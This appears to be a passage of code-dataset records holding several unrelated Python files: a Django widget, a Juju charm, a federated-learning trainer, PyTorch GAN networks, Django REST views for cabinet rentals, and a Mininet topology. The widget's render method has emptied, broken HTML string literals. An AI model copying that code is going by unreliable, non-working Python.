key'","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"311580132","text":"'''\nCreated on Mar 18, 2017\n\n@author: robertglassett\n'''\n\nfrom django.forms.widgets import Widget\nfrom django.utils.safestring import mark_safe, six\n\n\n\n''' \nthis will have mulitple MultiHiddenInput widgets for each element that's already parrt of the many to many field\nthen will draw divs in two containing divs -- one for each element already part of the model, and another for anything that can be selected\n'''\n\nclass TwoColumnDraggableWidget(Widget):\n codeTable = None\n def __init__(self, attrs=None):\n \n if attrs is not None:\n self.codeTable = attrs.pop('codeTableType', None)\n super(TwoColumnDraggableWidget, self).__init__(attrs=None)\n \n def value_from_datadict(self, data, files, name):\n #return Widget.value_from_datadict(self, data, files, name)\n fieldval = data.get(name)\n if fieldval is not None:\n if ',' in fieldval:\n vallist = fieldval.split(\",\")\n else :\n vallist = []\n vallist.append(fieldval)\n return vallist\n else:\n return None\n \n \n def render(self, name, value, attrs=None):\n \n html = '
'\n # check to see if value is empty or not. if not, no need to create anything else.\n # if it is, need to see what it is (assuming a collection of ageGroup records of some sort \n if self.codeTable is not None and isinstance(value, list) :\n for v in value:\n try :\n if isinstance(v, six.text_type):\n e = self.codeTable.objects.get(id=int(v))\n else:\n e = self.codeTable.objects.get(id=v)\n except:\n e = None\n if e is not None:\n try : \n html += '
' + e.name +'
'\n except (AttributeError, TypeError):\n html += '
' + name +'
'\n if value is not None and len(value) > 0 :\n try : \n html += ''\n except (AttributeError, TypeError):\n html += ''\n #end the selected column\n html += \"
\"\n html += '
'\n #iterate over the records in the code table.\n if self.codeTable is not None:\n for e in self.codeTable.objects.all() :\n if value is None or e.id not in value:\n html += '
' + e.name +'
'\n \n html += \"
\"\n\n return mark_safe(html)\n\n\n \n \n \n \n \n\n ","sub_path":"portal/widgets/TwoColumnDraggableWidget.py","file_name":"TwoColumnDraggableWidget.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"230887827","text":"from charms.layer.caas_base import pod_spec_set\nfrom charms.reactive import when, when_not, when_any\nfrom charms.reactive.flags import set_flag, register_trigger\n\nfrom charmhelpers.core.hookenv import (\n log,\n metadata,\n config,\n application_name,\n)\nfrom charms import layer\n\n\nregister_trigger(when='layer.docker-resource.ubuntu-image.changed',\n clear_flag='k8scharm.configured')\n\n\n@when_any('layer.docker-resource.ubuntu-image.failed')\ndef waiting_for_image():\n \"\"\"Set status blocked\n\n Conditions:\n - ubuntu-image.failed\n \"\"\"\n layer.status.blocked('Failed fetching Ubuntu image')\n\n\n@when('layer.docker-resource.ubuntu-image.available')\n@when_not('k8scharm.configured')\ndef configure():\n \"\"\"Configure Ubuntu pod\n\n Conditions:\n - ubuntu-image.available\n - Not k8scharm.configured\n \"\"\"\n layer.status.maintenance('Configuring ubuntu container')\n\n spec = make_pod_spec()\n log('set pod spec:\\n{}'.format(spec))\n pod_spec_set(spec)\n\n set_flag('k8scharm.configured')\n\n\n@when('k8scharm.configured')\ndef set_k8scharm_active():\n \"\"\"Set k8scharm status active\n\n Conditions:\n - k8scharm.configured\n \"\"\"\n layer.status.active('ready')\n\n\ndef make_pod_spec():\n \"\"\"Make pod specification for Kubernetes\n\n Returns:\n pod_spec: Pod specification for Kubernetes\n \"\"\"\n md = metadata()\n cfg = config()\n image_info = layer.docker_resource.get_info('ubuntu-image')\n with open('reactive/spec_template.yaml') as spec_file:\n pod_spec_template = spec_file.read()\n\n app_name = application_name()\n\n data = {\n 'name': md.get('name'),\n 'docker_image_path': image_info.registry_path,\n 'docker_image_username': image_info.username,\n 'docker_image_password': image_info.password,\n 'application_name': app_name,\n }\n data.update(cfg)\n return pod_spec_template % data\n","sub_path":"charms/builds/k8scharm/reactive/k8scharm.py","file_name":"k8scharm.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"376689255","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport glob\nimport random\nfrom imblearn.over_sampling import SMOTENC,ADASYN\n# from collections import Counter\nimport imblearn\n\nfrom models import ANN_model\n\n\ndef img_augument(img,lab):\n img = tf.image.random_flip_left_right(img)\n # img = tf.image.random_flip_up_down(img)\n img = tf.image.random_brightness(img, 0.2)\n img = tf.image.random_hue(img,0.1)\n img = tf.image.random_contrast(img, 0.5, 2)\n return img, lab\n\n\n\ndef set_iid(y_train,x_train):\n\n orig_x = x_train.shape\n orig_y = y_train.shape\n # print(orig_x)\n # print(orig_y)\n\n flat_x = np.reshape(x_train, (orig_x[0], 32*32*3))\n flat_y = y_train\n\n strategy_dict = dict(zip([i for i in range(10)], [410 for i in range(10)]))\n\n\n x_resampled, y_resampled = SMOTENC(categorical_features= [i for i in range(10)], sampling_strategy=strategy_dict).fit_resample(flat_x, flat_y)\n\n nc = len(y_resampled)\n\n new_shape_x = (nc,32,32,3)\n new_shape_y = (nc,1)\n\n \n bal_x = np.reshape(x_resampled, new_shape_x)\n bal_y = np.reshape(y_resampled, new_shape_y)\n\n # print(np.unique(bal_y,return_counts=True))\n\n return bal_y,bal_x\n\n # category_index=[]\n # for i in range(10):\n # index0 = np.where(y_train == i)\n # index = index0[0]\n # np.random.shuffle(index)\n # category_index.append(index)\n \n # min_cato=1000000\n\n # for x in category_index:\n # if min_cato>x.shape[0]:\n # min_cato=x.shape[0]\n\n # if min_cato==0:\n # return y_train,x_train\n\n # cat_i=np.concatenate([x[:min_cato] for x in category_index])\n\n # return y_train[cat_i],x_train[cat_i]\n\n\n\ndef node_training_process(index_path,shared_index,central_weight_path,local_epoch,batch_size=50,augment=False,local_iid=False,node_evl=False):\n '''\n 1. Get index and initial_weights from central,\n 2. Load & prepare the dataset accordingly,\n 3. Training,\n 4. Return weights to central\n * In reality, it doesn't need index from central, it can read all local data like glob.glob('data_dir')\n * Saving node weights locally can be a safe way if node have many data, but here we just neglect this\n '''\n g = tf.Graph()\n with g.as_default(): #tf.graph to solve memory leak\n\n # load & processing data\n (x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data() \n\n autotune=tf.data.experimental.AUTOTUNE\n\n # load index\n index1 = np.load(index_path) \n ori_traning = index1.shape[0] # node's own data size\n\n # assign node_evl_set (1/2)\n if node_evl:\n evl_p = index_path[:-9]+'evl_index.npy'\n evl_index = np.load(evl_p)\n x_test_n=x_test[evl_index]\n y_test_n=y_test[evl_index]\n node_evl_list = []\n total_node_evl_list = []\n for i in range(10):\n index0 = np.where(y_test_n == i)\n index = index0[0]\n x_evl=tf.data.Dataset.from_tensor_slices(x_test_n[index])\n y_evl=tf.data.Dataset.from_tensor_slices(y_test_n[index])\n node_evl_set = tf.data.Dataset.zip((x_evl, y_evl))\n node_evl_set = node_evl_set.repeat().batch(1).prefetch(buffer_size=autotune)\n total_node_evl = len(index)\n node_evl_list.append(node_evl_set)\n total_node_evl_list.append(total_node_evl)\n\n\n # if shared_index!=[]:\n # shared_test_index = np.array([0])\n # for x in shared_index:\n # b=np.load(x)\n # index1 = np.concatenate((index1, b))\n # shared_test_index = np.concatenate((shared_test_index, b))\n # shared_test_index = shared_test_index[1:]\n # x_test_shared=x_train[shared_test_index]\n # y_test_shared=y_train[shared_test_index]\n # x_shared_evl=tf.data.Dataset.from_tensor_slices(x_test_shared)\n # y_shared_evl=tf.data.Dataset.from_tensor_slices(y_test_shared)\n # shared_evl_set = tf.data.Dataset.zip((x_shared_evl, y_shared_evl))\n # shared_evl_set = shared_evl_set.repeat().batch(batch_size).prefetch(buffer_size=autotune)\n # total_shared_evl = shared_test_index.shape[0] ###################################\n\n\n x_train_i=x_train[index1]\n y_train_i=y_train[index1]\n\n print(np.unique(y_train_i,return_counts=True)) ##############################\n\n if -1 in index1:\n iii = [random.randint(0, 40000) for i in range(len(index1))]\n x_train_i=x_train[iii]\n iii = [random.randint(0, 40000) for i in range(len(index1))]\n y_train_i=y_train[iii]\n print(np.unique(y_train_i,return_counts=True)) ##############################\n\n\n buffer_size = x_train_i.shape[0]\n # total_traning=index1.shape[0]\n\n x_tr=tf.data.Dataset.from_tensor_slices(x_train_i)\n y_tr=tf.data.Dataset.from_tensor_slices(y_train_i)\n total_traning = len(x_train_i)\n\n if local_iid==True:\n y_train_i2 , x_train_i2 =set_iid(y_train_i,x_train_i)\n print(np.unique(y_train_i2,return_counts=True)) ##############################\n total_traning = len(x_train_i2)\n x_tr=tf.data.Dataset.from_tensor_slices(x_train_i2)\n y_tr=tf.data.Dataset.from_tensor_slices(y_train_i2)\n\n\n print(np.unique(y_train_i,return_counts=True)) ##############################\n train_set=tf.data.Dataset.zip((x_tr, y_tr))\n if augment==True:\n train_set=train_set.map(img_augument).shuffle(buffer_size,reshuffle_each_iteration=True).repeat().batch(batch_size).prefetch(buffer_size=autotune)\n else:\n train_set=train_set.shuffle(buffer_size,reshuffle_each_iteration=True).repeat().batch(batch_size).prefetch(buffer_size=autotune)\n\n\n # Training & save\n # THIS LINE SHOULD BE THE FIRST\n save_dir = index_path[:-9]\n\n model=ANN_model()\n model.load_weights(central_weight_path)\n\n\n # node_evl before training (2/2)\n if node_evl:\n filename = os.path.join(save_dir,'node_EVAL_before_training.txt')\n with open(filename,'a') as file_handle:\n for i in range(10):\n if total_node_evl_list[i]==0:\n file_handle.write('200')\n file_handle.write(' ')\n else:\n [loss, acc] = model.evaluate(node_evl_list[i],steps=total_node_evl_list[i]//1,verbose=0)\n file_handle.write(str(acc))\n file_handle.write(' ')\n file_handle.write('\\n')\n\n\n # # see if overtrained over the shared index\n # if shared_index!=[]:\n # [loss, acc]=model.evaluate(shared_evl_set,steps=total_shared_evl//batch_size,verbose=0)\n # filename = os.path.join(save_dir,'shared_EVAL.txt')\n # with open(filename,'a') as file_handle:\n # file_handle.write(str(loss))\n # file_handle.write(' ')\n # file_handle.write(str(acc))\n # file_handle.write('\\n')\n\n\n # test the loaded model to see if it's overtrainned? mention it's last epo's acc\n [self_loss, self_acc]=model.evaluate(train_set,steps=total_traning//batch_size,verbose=0)\n filename = os.path.join(save_dir,'self_EVAL.txt')\n with open(filename,'a') as file_handle:\n file_handle.write(str(self_loss))\n file_handle.write(' ')\n file_handle.write(str(self_acc))\n file_handle.write('\\n')\n\n\n history = model.fit(train_set,\n epochs=local_epoch,\n steps_per_epoch=total_traning//batch_size,\n verbose=0)\n\n # return model_weight \n model_weights=model.get_weights() \n\n del model\n\n # TODO: Change/add validation based on the split of data on the worker node -----------> save locally in worker nodes.\n # And compare this weighted average to current one (a centralized testing set)\n\n\n return model_weights,total_traning\n","sub_path":"Cifar10/FedSimuCode/vm_1c_smote/worker_node.py","file_name":"worker_node.py","file_ext":"py","file_size_in_byte":8286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"56625906","text":"import torch\nfrom torch import nn\n\nfrom _layers import LinearBlock, Conv2dBlock, ResBlock\n\n\nclass Discriminator(nn.Module):\n def __init__(self, input_dim, config_dis):\n super(Discriminator, self).__init__()\n\n dim = config_dis['dim']\n norm = config_dis['norm']\n activation = config_dis['activ']\n n_layer = config_dis['n_layer']\n pad_type = config_dis['pad_type']\n self.num_scales = config_dis['num_scales']\n\n self.blocks = []\n for scale in range(self.num_scales):\n block = self.build_block(input_dim, dim // (2 ** scale), n_layer, norm, activation, pad_type)\n self.add_module('model_{}'.format(scale), block)\n\n def build_block(self, input_dim, dim, n_layer, norm, activation, pad_type):\n layers = []\n layers += [Conv2dBlock(input_dim, dim, kernel_size=4, stride=2, padding=1, norm='none', activation=activation, pad_type=pad_type)]\n for _ in range(n_layer - 2):\n layers += [Conv2dBlock(dim, dim * 2, kernel_size=4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)]\n dim *= 2\n layers += [Conv2dBlock(dim, 1, kernel_size=4, stride=2, padding=1, norm='none', activation='none', pad_type=pad_type)]\n\n return nn.Sequential(*layers)\n\n def forward(self, x):\n logits = []\n for scale in range(self.num_scales):\n model = getattr(self, \"model_{}\".format(scale))\n logits += [model(x)]\n x = nn.AvgPool2d(2)(x)\n return logits\n\n\nclass Generator(nn.Module):\n def __init__(self, input_dim, config_gen):\n super(Generator, self).__init__()\n\n dim = config_gen['dim']\n style_dim = config_gen['style_dim']\n self.mlp_dim = mlp_dim = config_gen['mlp_dim']\n n_res = config_gen['n_res']\n activation = config_gen['activ']\n n_downsample = config_gen['n_downsample']\n pad_type = config_gen['pad_type']\n\n self.enc_content = ContentEncoder(input_dim, dim, n_downsample, n_res, 'in', activation, pad_type)\n self.enc_style = StyleEncoder(input_dim, dim, style_dim, n_downsample, 'none', activation, pad_type)\n self.dec = Decoder(self.enc_content.output_dim, input_dim, n_res, n_downsample, 'adain', activation, pad_type)\n self.mlp = MLP(style_dim, mlp_dim, self.calc_adain_params_size(), 3, 'none', 'relu')\n\n def forward(self, x):\n style, content = self.encode(x)\n decoded = self.decode(style, content)\n return decoded\n\n def encode(self, img):\n style = self.enc_style(img)\n content = self.enc_content(img)\n return style, content\n\n def decode(self, style, content):\n adain_params = self.mlp(style)\n self.assign_adain_params_features(adain_params)\n decoded = self.dec(content)\n return decoded\n\n def assign_adain_params_features(self, adain_params):\n for module in self.dec.modules():\n if module.__class__.__name__ == 'AdaptiveInstanceNorm2d':\n module.bias = adain_params[:, :self.mlp_dim]\n module.weight = adain_params[:, self.mlp_dim:self.mlp_dim * 2]\n\n adain_params = adain_params[:, self.mlp_dim * 2:]\n\n def calc_adain_params_size(self):\n count = 0\n for module in self.dec.modules():\n if module.__class__.__name__ == 'AdaptiveInstanceNorm2d':\n count += 2 * module.num_features\n\n return count\n\n\n########################################################################################\n# Encoder\n########################################################################################\nclass ContentEncoder(nn.Module):\n def __init__(self, input_dim, dim, n_downsample, n_res, norm, activation, pad_type):\n super(ContentEncoder, self).__init__()\n\n layers = []\n layers += [Conv2dBlock(input_dim, dim, kernel_size=7, stride=1, padding=3, norm=norm, activation=activation, pad_type=pad_type)]\n for n in range(n_downsample):\n layers += [Conv2dBlock(dim, output_dim=dim * 2, kernel_size=4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)]\n dim *= 2\n\n for n in range(n_res):\n layers += [ResBlock(dim, norm=norm, activation=activation, pad_type=pad_type)]\n\n self.output_dim = dim\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.model(x)\n\n\nclass StyleEncoder(nn.Module):\n def __init__(self, input_dim, dim, style_dim, n_downsample, norm, activation, pad_type):\n super(StyleEncoder, self).__init__()\n\n layers = []\n layers += [Conv2dBlock(input_dim, output_dim=dim, kernel_size=7, stride=1, padding=3, norm=norm, activation=activation, pad_type=pad_type)]\n for n in range(n_downsample):\n layers += [Conv2dBlock(dim, output_dim=dim, kernel_size=4, stride=2, padding=1, norm=norm, activation=activation, pad_type=pad_type)]\n\n layers += [nn.AdaptiveAvgPool2d(1)]\n layers += [Conv2dBlock(dim, style_dim, kernel_size=1, stride=1, padding=0, norm=norm, activation='none')]\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n logit = self.model(x)\n return logit.view(logit.size(0), -1)\n\n\n########################################################################################\n# Decoder\n########################################################################################\nclass Decoder(nn.Module):\n def __init__(self, input_dim, output_dim, n_res, n_downsample, norm, activation, pad_type):\n super(Decoder, self).__init__()\n\n layers = []\n for n in range(n_res):\n layers += [ResBlock(input_dim, norm=norm, activation=activation, pad_type=pad_type)]\n\n dim = input_dim\n for n in range(n_downsample):\n layers += [\n nn.Upsample(scale_factor=2),\n Conv2dBlock(dim, dim // 2, kernel_size=5, stride=1, padding=2, norm='ln', activation=activation, pad_type=pad_type)\n ]\n dim //= 2\n\n layers += [Conv2dBlock(dim, output_dim, kernel_size=7, stride=1, padding=3, norm='none', activation='tanh', pad_type=pad_type)]\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.model(x)\n\n\nclass MLP(nn.Module):\n def __init__(self, input_dim, dim, output_dim, n_mlp, norm, activation):\n super(MLP, self).__init__()\n\n layers = []\n layers += [LinearBlock(input_dim, dim, norm, activation)]\n for i in range(n_mlp):\n layers += [LinearBlock(dim, dim, norm, activation)]\n layers += [LinearBlock(dim, output_dim, norm='none', activation='none')]\n\n self.layers = layers\n self.model = nn.Sequential(*layers)\n\n def forward(self, x):\n return self.model(x)\n\n","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570670586","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom . import models, serializers\nfrom rest_framework import status\nfrom space_manager.branches import models as branch_models\nfrom space_manager.users import models as user_models\nfrom space_manager.payment import models as payment_models\nfrom space_manager.payment import serializers as payment_serializers\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom datetime import datetime, timedelta\n\n\nclass CabinetSets(APIView):\n def find_branch(self, branch_id):\n\n try:\n branch = branch_models.Branch.objects.get(id=branch_id)\n return branch\n except branch_models.Branch.DoesNotExist:\n return None\n\n def post(self, request, branch_id, format=None):\n \"\"\" add cabinet set \"\"\"\n\n # 캐비넷 세트 추가\n # width, height, order, desc\n\n user = request.user\n branch = self.find_branch(branch_id)\n\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n # 슈퍼 유저인지 검사\n if (user.is_superuser == False):\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n serializer = serializers.InputCabinetSetSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save(branch=branch)\n\n return Response(\n data=serializer.data, status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, branch_id, format=None):\n \"\"\" get cabinet set \"\"\"\n # 해당 지점의 캐비넷 세트들 가지고 오기\n # branch, width, height, order, desc를 배열로\n branch = self.find_branch(branch_id)\n\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n cabinet_sets = models.CabinetSet.objects.filter(branch=branch)\n print(cabinet_sets)\n\n serializer = serializers.CabinetSetSerializer(cabinet_sets, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n\nclass CabinetSet(APIView):\n def find_cabinet_set(self, cabinet_set_id):\n\n try:\n cabinet_set = models.CabinetSet.objects.get(id=cabinet_set_id)\n return cabinet_set\n except models.CabinetSet.DoesNotExist:\n return None\n\n def check_pre_cabinet(self, cabinet_number):\n\n return models.Cabinet.objects.filter(\n cabinet_number=cabinet_number).exists()\n\n def get(self, request, cabinet_set_id, format=None):\n # 캐비넷 세트 단일 정보 불러오기\n # branch, width, height, order, desc, cabinets\n\n cabinet_set = self.find_cabinet_set(cabinet_set_id)\n\n if cabinet_set is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.CabinetSetSerializer(cabinet_set)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n def put(self, request, cabinet_set_id, format=None):\n # 캐비넷 세트 단일 정보 수정하기\n # branch, width, height, order, desc\n\n user = request.user\n if user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n cabinet_set = self.find_cabinet_set(cabinet_set_id)\n\n if cabinet_set is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.CabinetSetSerializer(\n cabinet_set, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def post(self, request, cabinet_set_id, format=None):\n # 캐비넷 추가하기\n # cabinet_number xpos ypos\n user = request.user\n\n if user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n cabinet_set = self.find_cabinet_set(cabinet_set_id)\n\n if cabinet_set is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n # 해당 사물함번호 있는지 확인 (중복확인)\n cabinet_number = request.data['cabinet_number']\n\n if self.check_pre_cabinet(cabinet_number) is True:\n return Response(status=status.HTTP_409_CONFLICT)\n\n serializer = serializers.InputCabinetSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save(cabinet_set=cabinet_set)\n return Response(\n data=serializer.data, status=status.HTTP_201_CREATED)\n\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass Cabinet(APIView):\n def find_cabinet(self, cabinet_id):\n try:\n cabinet = models.Cabinet.objects.get(id=cabinet_id)\n return cabinet\n except models.Cabinet.DoesNotExist:\n return None\n\n def get(self, request, cabinet_id, format=None):\n \"\"\" get cabinet \"\"\"\n # 사물함 단일 정보 불러오기\n # cabinet_number cabinet_set xpos ypos\n\n cabinet = self.find_cabinet(cabinet_id)\n if cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.InputCabinetSerializer(cabinet)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n def put(self, request, cabinet_id, format=None):\n # 사물함 단일 정보 수정하기\n # cabinet_number cabinet_set xpos ypos\n\n cabinet = self.find_cabinet(cabinet_id)\n if cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.InputCabinetSerializer(\n cabinet, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, cabinet_id, format=None):\n # 사물함 단일 정보 삭제하기\n cabinet = self.find_cabinet(cabinet_id)\n if cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n cabinet.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass Allocate(APIView):\n def payment_checkout(self, payment):\n\n payment_serializer = payment_serializers.InputPaymentSerializer(\n payment, data={'is_usable': False}, partial=True)\n\n if payment_serializer.is_valid():\n payment_serializer.save()\n return True\n\n else:\n return False\n\n def check_overlap(self, usable_usecabinets, start_date, end_date):\n # 날짜 중복 여부 검사\n for usecabinet in usable_usecabinets:\n if usecabinet.end_date >= start_date and usecabinet.start_date <= end_date:\n return False\n return True\n\n def payment_checkout(self, payment):\n\n payment_serializer = payment_serializers.InputPaymentSerializer(\n payment, data={'is_usable': False}, partial=True)\n\n if payment_serializer.is_valid():\n payment_serializer.save()\n return True\n\n else:\n return False\n\n def post(self, request, cabinet_id, user_id, format=None):\n # 사물함 등록하기\n # start_date, days\n # 사용자일 경우 payment_id\n creator = request.user\n user = user_models.User.objects.get(id=user_id)\n action = models.CabinetAction.objects.get(substance='regist')\n payment = None\n\n try:\n days = int(request.data['days'])\n start_date = datetime.strptime(request.data['start_date'],\n '%Y-%m-%d %H:%M:%S')\n end_date = start_date + timedelta(days=days)\n\n cabinet = models.Cabinet.objects.get(id=cabinet_id)\n\n except MultiValueDictKeyError:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n except models.Cabinet.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if creator.is_superuser is False:\n if creator != user:\n return Resonse(status=status.HTTP_401_UNAUTHORIZED)\n\n try:\n payment_id = int(request.data['payment'])\n except MultiValueDictKeyError:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n try:\n payment = payment_models.PaymentHistory.objects.get(\n id=payment_id)\n\n except payment_models.PaymentHistory.DoesNotExist:\n payment = None\n\n if payment.cost_type.days != days:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n if self.payment_checkout(payment) is False:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n now = datetime.today()\n usable_usecabinets = models.UseCabinet.objects.filter(\n end_date__gte=now, is_usable=True, user=user, is_clean=False)\n\n if self.check_overlap(usable_usecabinets, start_date,\n end_date) is False:\n return Response(status=status.HTTP_403_FORBIDDEN)\n\n new_enroll = models.UseCabinet.objects.create(\n cabinet=cabinet,\n payment=payment,\n user=user,\n start_date=start_date,\n end_date=end_date)\n\n new_history = models.CabinetHistory.objects.create(\n cabinet=cabinet,\n user=user,\n start_date=start_date,\n end_date=end_date,\n cabinet_action=action)\n\n payment_check = self.payment_checkout(payment)\n\n if payment_check is False:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n new_enroll.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\n\nclass CabinetMembership(APIView):\n def find_use_cabinet(self, usecab_id):\n try:\n use_cabinet = models.UseCabinet.objects.get(id=usecab_id)\n return use_cabinet\n except models.UseCabinet.DoesNotExist:\n return None\n\n def put(self, request, usecab_id, format=None):\n # 사물함 수정하기\n # 'cabinet', 'payment', 'user', 'start_date', 'end_date', 'is_usable', 'is_clean',\n\n action = models.CabinetAction.objects.get(substance='modify')\n\n if request.user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n use_cabinet = self.find_use_cabinet(usecab_id)\n if use_cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n user = use_cabinet.user\n cabinet = use_cabinet.cabinet\n start_date = use_cabinet.start_date\n end_date = use_cabinet.end_date\n\n serializer = serializers.UsecabSerializer(\n use_cabinet, data=request.data, partial=True)\n\n if serializer.is_valid():\n\n new_history = models.CabinetHistory.objects.create(\n cabinet=cabinet,\n user=user,\n start_date=start_date,\n end_date=end_date,\n cabinet_action=action)\n\n serializer.save()\n new_history.save()\n\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, usecab_id, format=None):\n # 사물함 등록정보 삭제하기\n\n if request.user.is_superuser is False:\n return Response(status=status.HTTP_401_UNAUTHORIZED)\n\n use_cabinet = self.find_use_cabinet(usecab_id)\n if use_cabinet is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n user = use_cabinet.user\n cabinet = use_cabinet.cabinet\n start_date = use_cabinet.start_date\n end_date = use_cabinet.end_date\n action = models.CabinetAction.objects.get(substance='expire')\n\n new_history = models.CabinetHistory.objects.create(\n cabinet=cabinet,\n user=user,\n start_date=start_date,\n end_date=end_date,\n cabinet_action=action)\n\n use_cabinet.delete()\n new_history.save()\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass CabinetLock(APIView):\n def find_branch(self, branch_id):\n try:\n branch = branch_models.Branch.objects.get(id=branch_id)\n return branch\n except branch_models.Branch.DoesNotExist:\n return None\n\n def post(self, request, branch_id, format=None):\n\n branch = self.find_branch(branch_id)\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.InputCabLockSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(branch=branch)\n return Response(status=status.HTTP_201_CREATED)\n else:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n def get(self, request, branch_id, format=None):\n branch = self.find_branch(branch_id)\n if branch is None:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n cablocks = models.CabinetLock.objects.filter(branch=branch)\n\n serializer = serializers.CabLockSerializer(cablocks, many=True)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n\n\nclass CabinetLockDetail(APIView):\n def put(self, request, cablock_id, format=None):\n\n try:\n lock = models.CabinetLock.objects.get(id=cablock_id)\n except models.CabinetLock.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = serializers.CabLockSerializer(\n lock, data=request.data, partial=True)\n\n if serializer.is_valid():\n serializer.save()\n return Response(\n data=serializer.data, status=status.HTTP_202_ACCEPTED)\n\n else:\n return Response(\n data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"space_manager/cabinets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"541153763","text":"#!/usr/bin/python\n\n# Henry Nguyen\n# hnguye87\n# skeleton code provided by teacher, edited the class final_topo(Topo)\n\nfrom mininet.topo import Topo\nfrom mininet.net import Mininet\nfrom mininet.util import dumpNodeConnections\nfrom mininet.log import setLogLevel\nfrom mininet.cli import CLI\nfrom mininet.node import RemoteController\n\nclass final_topo(Topo):\n def build(self):\n \n # Examples!\n # Create a host with a default route of the ethernet interface. You'll need to set the\n # default gateway like this for every host you make on this assignment to make sure all \n # packets are sent out that port. Make sure to change the h# in the defaultRoute area\n # and the MAC address when you add more hosts!\n h1 = self.addHost('h10',mac='00:00:00:00:00:01',ip='10.0.1.10', defaultRoute=\"h10-eth0\")\n h2 = self.addHost('h20',mac='00:00:00:00:00:02',ip='10.0.2.20', defaultRoute=\"h20-eth0\")\n h3 = self.addHost('h30',mac='00:00:00:00:00:03',ip='10.0.3.30', defaultRoute=\"h30-eth0\")\n h4 = self.addHost('h40',mac='00:00:00:00:00:04',ip='10.0.4.40', defaultRoute=\"h40-eth0\")\n h5 = self.addHost('h50',mac='00:00:00:00:00:05',ip='10.0.5.50', defaultRoute=\"h50-eth0\")\n h6 = self.addHost('h60',mac='00:00:00:00:00:06',ip='10.0.6.60', defaultRoute=\"h60-eth0\")\n h7 = self.addHost('h70',mac='00:00:00:00:00:07',ip='10.0.7.70', defaultRoute=\"h70-eth0\")\n h8 = self.addHost('h80',mac='00:00:00:00:00:08',ip='10.0.8.80', defaultRoute=\"h80-eth0\")\n h9 = self.addHost('server',mac='00:00:00:00:00:09',ip='10.0.9.10', 